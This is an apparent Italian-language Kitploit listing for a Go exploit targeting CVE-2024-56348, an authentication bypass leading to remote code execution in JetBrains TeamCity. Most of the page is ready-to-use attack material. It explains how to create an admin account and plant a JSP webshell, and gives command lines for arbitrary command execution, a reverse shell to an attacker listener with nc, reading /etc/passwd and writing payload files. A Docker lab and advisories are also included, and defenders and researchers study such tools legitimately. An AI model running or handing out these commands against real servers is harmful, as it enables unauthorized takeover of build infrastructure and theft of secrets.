Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-56348 — Exploit basato su Go per CVE-2024-56348 che colpisce il bypass dell'autenticazione e l'esecuzione remota di codice in JetBrains TeamCity. Fornisce shell interattiva, reverse shell, lettura/scrittura di file ed esecuzione di comando singolo senza credenziali. | Kitploit
Strumenti/GitHubGitHub/joshuavanderpoll/cve-2024-56348
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed TeamingStrumento di Accesso Remoto
GitHubjoshuavanderpoll/cve-2024-56348

cve-2024-56348

Exploit basato su Go per CVE-2024-56348 che colpisce il bypass dell'autenticazione e l'esecuzione remota di codice in JetBrains TeamCity. Fornisce shell interattiva, reverse shell, lettura/scrittura di file ed esecuzione di comando singolo senza credenziali.

Vedi RepositorySito web
236 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

JetBrains TeamCity Bypass di Autenticazione + RCE (CVE-2024-56348) PoC

Go

📜 Descrizione

CVE-2024-56348 è una vulnerabilità critica di bypass dell'autenticazione in JetBrains TeamCity on-premises che interessa tutte le versioni precedenti alla 2024.12. L'API REST gestisce in modo improprio le richieste a percorsi contenenti ;.jsp, consentendo a un utente non autenticato di invocare qualsiasi endpoint REST come se fosse completamente autenticato.

Questo exploit combina il bypass con la propria API REST di TeamCity per creare un account SYSTEM_ADMIN, generare un token API e ottenere esecuzione completa di codice remoto — sia attraverso l'endpoint di debug integrato che tramite una webshell JSP caricata dinamicamente. Non sono richieste credenziali.

Versioni affette: JetBrains TeamCity on-premises < 2024.12

✨ Caratteristiche

  • Shell interattiva — pseudo-shell con separazione di stdout/stderr e codice di uscita nel prompt
  • Esecuzione comandi — singolo comando tramite -command con output completo di stdout, stderr e codice di uscita
  • Reverse shell — distribuisce una webshell JSP e attiva un callback sul tuo listener
  • Lettura file — legge qualsiasi file accessibile dal processo TeamCity
  • Scrittura file — scrive contenuti arbitrari in qualsiasi percorso scrivibile sul server

🛠️ Installazione

root@kitploit:~
git clone https://github.com/joshuavanderpoll/cve-2024-56348.git
cd CVE-2024-56348
go build -o exp cve-2024-56348.go

Installa direttamente con Go

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2024-56348@latest

Esegui senza installare

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2024-56348@latest -t http://127.0.0.1:8111

⚙️ Utilizzo

root@kitploit:~
  -t          URL di destinazione (es. http://127.0.0.1:8111)
  -command    Esegue un singolo comando e stampa l'output
  -shell      Avvia una reverse shell (richiede -lhost e -lport)
  -lhost      Host del listener per la reverse shell
  -lport      Porta del listener per la reverse shell
  -read-file  Legge un file remoto e ne stampa il contenuto
  -write-file Percorso remoto in cui scrivere (richiede -file-content)
  -file-content Contenuto da scrivere quando si usa -write-file

Nessun flag di azione avvia automaticamente una shell interattiva.


Verifica vulnerabilità + shell interattiva

Si connette al target, conferma il bypass, crea un account amministratore temporaneo e avvia una shell interattiva. Il prompt mostra il codice di uscita dell'ultimo comando in verde (successo) o rosso (non zero).

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111

Shell interattiva


Esecuzione di un singolo comando

Esegue un comando e stampa stdout, stderr e codice di uscita separatamente.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -command "id"

Esecuzione comando


Reverse shell

Distribuisce la webshell JSP e attiva una reverse shell verso il tuo listener. Prima avvia nc -lvp 4444.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -shell -lhost 10.0.0.1 -lport 4444

Reverse shell


Lettura file

Legge qualsiasi file accessibile dal processo TeamCity — utile per file di configurazione, chiavi SSH, ecc.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -read-file /etc/passwd

Lettura file


Scrittura file

Scrive contenuti arbitrari in un percorso remoto. Utile per depositare payload aggiuntivi o modificare la configurazione.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -write-file /tmp/readme.txt -file-content "LEAVE ME HERE"

Scrittura file


🐋 Docker PoC

Un ambiente Docker Compose autonomo con un'istanza vulnerabile di TeamCity per test locali. Vedi DOCKER.md per maggiori dettagli

root@kitploit:~
cd docker/
docker compose up -d
./cve-2024-56348 -t http://127.0.0.1:8111

Se lo script restituisce "[-] Plugin upload failed." prova ad accedere con l'utente hackindex e riprova. (le credenziali sono in DOCKER.md)

🕵🏼 Riferimenti

  • Avviso di sicurezza JetBrains — CVE-2024-56348
  • NVD — CVE-2024-56348
  • HackIndex

📢 Dichiarazione di esclusione responsabilità

Questo strumento è fornito solo a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per eventuali usi impropri o danni causati da questo strumento.

Scarica lo strumento